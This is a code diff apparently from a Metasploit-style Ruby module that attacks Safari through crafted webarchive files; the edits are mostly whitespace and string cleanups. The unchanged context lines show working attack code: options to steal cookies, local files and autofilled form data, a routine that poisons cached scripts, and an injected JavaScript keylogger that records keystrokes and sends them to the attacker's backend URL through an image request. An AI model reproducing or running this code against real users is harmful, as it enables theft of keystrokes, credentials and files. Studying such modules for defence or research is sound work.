@@ -51,12 +51,9 @@ def initialize(info = {})
51
51
OptString . new ( 'FILE_URLS' , [ false , 'Additional file:// URLs to steal.' , '' ] ) ,
52
52
OptBool . new ( 'STEAL_COOKIES' , [ true , "Enable cookie stealing." , true ] ) ,
53
53
OptBool . new ( 'STEAL_FILES' , [ true , "Enable local file stealing." , true ] ) ,
54
- OptBool . new ( 'INSTALL_KEYLOGGERS' , [ true , "Attempt to poison the user's cache " +
55
- "with a javascript keylogger." , true ] ) ,
54
+ OptBool . new ( 'INSTALL_KEYLOGGERS' , [ true , "Attempt to poison the user's cache with a javascript keylogger." , true ] ) ,
56
55
OptBool . new ( 'STEAL_FORM_DATA' , [ true , "Enable form autofill stealing." , true ] ) ,
57
-
58
- OptBool . new ( 'ENABLE_POPUPS' , [ false , "Enable the popup window fallback method for" +
59
- " stealing form data." , true ] )
56
+ OptBool . new ( 'ENABLE_POPUPS' , [ false , "Enable the popup window fallback method for stealing form data." , true ] )
60
57
] ,
61
58
self . class )
62
59
end
@@ -163,7 +160,7 @@ def start_http(opts={})
163
160
def on_request_uri ( cli , request )
164
161
begin
165
162
data = if request . body . size > 0
166
- request . body
163
+ request . body
167
164
else
168
165
request . qstring [ 'data' ]
169
166
end
@@ -186,7 +183,7 @@ def webarchive_xml
186
183
def webarchive_header
187
184
%Q|
188
185
<?xml version="1.0" encoding="UTF-8"?>
189
- <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
186
+ <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
190
187
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
191
188
<plist version="1.0">
192
189
<dict>
@@ -254,7 +251,7 @@ def webarchive_resources_for_poisoning_cache(url)
254
251
scripts = scripts_to_poison [ url_idx ] || [ ]
255
252
xml_dicts = scripts . map do |script |
256
253
script_body = inject_js_keylogger ( script [ :body ] )
257
- puts
254
+ puts
258
255
%Q|
259
256
<dict>
260
257
<key>WebResourceData</key>
@@ -293,8 +290,8 @@ def web_response_xml(script)
293
290
# this is a binary plist, but im too lazy to write a real encoder.
294
291
# ripped this straight out of a safari webarchive save.
295
292
script [ 'content-length' ] = script [ :body ] . length
296
- whitelist = %w( content-type content-length date etag
297
- Last-Modified cache-control expires )
293
+ whitelist = %w( content-type content-length date etag
294
+ Last-Modified cache-control expires )
298
295
headers = script . clone . delete_if { |k , v | not whitelist . include? k }
299
296
300
297
key_set = headers . keys . sort
@@ -612,7 +609,7 @@ def steal_form_data_for_url(url)
612
609
var iframe = tryInIframe();
613
610
if (#{ should_pop_up? } ) {
614
611
window.setTimeout(function(){
615
-
612
+
616
613
if (iframe.contentDocument &&
617
614
iframe.contentDocument.location.href == 'about:blank') {
618
615
tryInNewWin();
@@ -670,7 +667,7 @@ def inject_js_keylogger(original_js)
670
667
data = JSON.stringify({keystrokes: keystrokes, time: time});
671
668
img.src = '#{ backend_url } #{ collect_data_uri } ?data='+data;
672
669
}
673
- document.addEventListener('keydown', function(e) {
670
+ document.addEventListener('keydown', function(e) {
674
671
var c = String.fromCharCode(e.keyCode);
675
672
if (c.length > 0) buffer += c;
676
673
}, true);
@@ -743,8 +740,8 @@ def find_cached_scripts
743
740
etag = io . meta [ 'etag' ]
744
741
# lets see if we are able to "poison" the cache for this asset...
745
742
if ( !expires . nil? && Time . now < expires ) or
746
- ( cache_control . length > 0 ) or # if asset is cacheable
747
- ( not last_modified . nil? and last_modified . to_s . length > 0 )
743
+ ( cache_control . length > 0 ) or # if asset is cacheable
744
+ ( not last_modified . nil? and last_modified . to_s . length > 0 )
748
745
print_status ( "Found cacheable #{ url } " )
749
746
io . meta . merge ( :body => io . read , :url => url )
750
747
else
@@ -807,8 +804,8 @@ def urls
807
804
# @return [String] input with dangerous chars replaced with xml entities
808
805
def escape_xml ( input )
809
806
input . to_s . gsub ( "&" , "&" ) . gsub ( "<" , "<" )
810
- . gsub ( ">" , ">" ) . gsub ( "'" , "'" )
811
- . gsub ( "\" " , """ )
807
+ . gsub ( ">" , ">" ) . gsub ( "'" , "'" )
808
+ . gsub ( "\" " , """ )
812
809
end
813
810
814
811
def should_steal_cookies?
0 commit comments